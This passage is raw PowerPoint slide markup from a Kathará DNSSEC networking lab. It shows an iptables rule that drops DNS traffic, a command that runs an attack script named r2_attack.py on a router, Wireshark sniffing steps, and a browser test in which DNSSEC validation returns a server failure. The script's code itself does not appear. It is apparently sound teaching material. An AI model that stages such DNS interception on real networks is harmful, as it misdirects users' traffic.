                <a:t>iptables –A FORWARD –d 110.0.0.10 –p </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>udp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> --</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dport</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 53 –j DROP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>root@r2:/# </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>python3 r2_attack.py</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" b="1" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D18E0DE-331C-3E09-2A88-897AA5D43996}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4868024" y="2378845"/>
              <a:ext cx="671225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r2</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="18" name="Group 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56B6A8EA-B4E3-B638-BB89-E9157544E36C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10920536" y="2466851"/>
              <a:ext cx="581348" cy="126235"/>
              <a:chOff x="8092857" y="2115830"/>
              <a:chExt cx="581348" cy="126235"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="19" name="Rectangle 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E4C829E-92EC-E662-7D66-B19735137FF7}"/>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20" name="Rectangle 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2F6C296-B8AF-8C68-94A3-7CBDE6568B22}"/>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21" name="Rectangle 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0AD7FFE-D33A-7C29-363A-5D642E5BBD55}"/>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32409340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C445B-BAD8-F2AC-8834-2BC1BAB8AD6B}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18436" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADDF457E-48FA-E1BF-20A6-6CFFE5F0866B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>sniff the traffic</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18437" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69EB8678-F530-596D-6072-7F4A7F6196F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
              <a:t>connect the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" noProof="0" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
              <a:t> device to collision domain B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
              <a:t>open any browser on the host machine </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0" dirty="0"/>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" noProof="0" dirty="0"/>
              <a:t>localhost:3000 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0" dirty="0"/>
              <a:t>sniff eth1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D72F4BB7-2CB3-B63F-AE1A-F70164CD808F}"/>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1D758A89-8D13-927D-529F-0ED8F6DE9EFE}"/>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31" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D821D27-4251-318C-D639-089B2CC0824B}"/>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C8FA2AC3-F1D4-BB49-CC82-87287BDA7755}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="607480" y="2668294"/>
              <a:ext cx="10972799"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algn="just" eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" noProof="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>user@localhost</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:~</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/kithara-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnssec</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>$</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" noProof="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>kathara</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" noProof="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>lconfig</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -n </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" noProof="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>wireshark</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> --add </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>B</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{898E1ED7-D2DE-0B7F-6873-9FCD6A2C2092}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="607480" y="2378845"/>
              <a:ext cx="10972800" cy="2894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1BA79109-929E-3B52-B27B-5378F95D58F8}"/>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CFA5C29B-BB41-8CC8-4357-6259D7D6712B}"/>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8" name="Rectangle 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40D3B4BC-07F0-9F4E-84AD-31EA3BB37E5A}"/>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7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E691907-D4EC-07C8-370E-F3FEAC4BD88E}"/>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16986359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3B6EB-53E1-B755-3291-948C7DD9774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BBE15F2-67EC-C188-A6A2-AE4817CE8B0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>firefox</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Segnaposto contenuto 6" descr="Immagine che contiene testo, schermata, software, Icona del computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA6F0D92-AD8F-BDB3-0278-1C41A27480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6914" y="1082911"/>
            <a:ext cx="9571511" cy="5436658"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44163916-990F-E75B-5DE2-0570C93EDF4F}"/>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CDE8AA6E-512B-CE77-09BD-757B42CF864D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A3DF717-3AC0-538C-E9D5-B422C8DCB44F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5838858" y="1868398"/>
            <a:ext cx="2782277" cy="1421068"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -104244"/>
              <a:gd name="adj2" fmla="val -63765"/>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type "www.uniroma3.it" as the URL in the search bar</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1282835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CB8D4-1FDB-7F29-3DF8-05E23A3D7CD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A551C69-B986-D21F-6CD5-08261D3F5105}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>firefox</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA900A29-4A67-7797-F0CC-AD2AD37C7781}"/>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DFCD2197-EDD8-5457-5EA5-A549E6420A01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Segnaposto contenuto 8" descr="Immagine che contiene testo, schermata, software, Pagina Web&#10;&#10;Il contenuto generato dall'IA potrebbe non essere corretto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6C22FC3-E9F7-277D-71D7-0788E6BB1B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7127" y="1078483"/>
            <a:ext cx="8977746" cy="5374708"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23143A59-8926-58BF-7CAD-8719B3BADD83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8917303" y="1259632"/>
            <a:ext cx="2782277" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -114061"/>
              <a:gd name="adj2" fmla="val 121730"/>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err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> worked, returning server failure</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14872720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29CA0-0A09-A6F8-2E6B-F3ADB1821BF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3358353-DF27-0C8D-90A2-9C44FAF2F204}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>wireshark</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9DF6EFB-0445-925A-30AE-57750F7E2C79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>last update: Nov 2025</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F644EA51-4218-765D-985B-0417D77BD24D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT"/>
              <a:t>kathara – [ lab: basic-ipv4 ]</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Segnaposto contenuto 6" descr="Immagine che contiene testo, schermata, software, Pagina Web&#10;&#10;Il contenuto generato dall'IA potrebbe non essere corretto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F54C2782-7997-EF12-820D-56C9A225F3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7338" y="1105070"/>
            <a:ext cx="10657324" cy="5348121"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2499663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608B6-043B-5582-FC9F-2B8C4BB0993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5AD22EB-1C4B-3ACF-7317-14E2F138796A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>wireshark</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B842205D-1301-F8C6-CC37-78CDF3773834}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>last update: Nov 2025</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9EFD20E-EB70-F82E-8708-1F5AC5CF3B5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT"/>
              <a:t>kathara – [ lab: basic-ipv4 ]</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Segnaposto contenuto 7" descr="Immagine che contiene testo, schermata, software, Pagina Web&#10;&#10;Il contenuto generato dall'IA potrebbe non essere corretto.">
            <a:extLst>
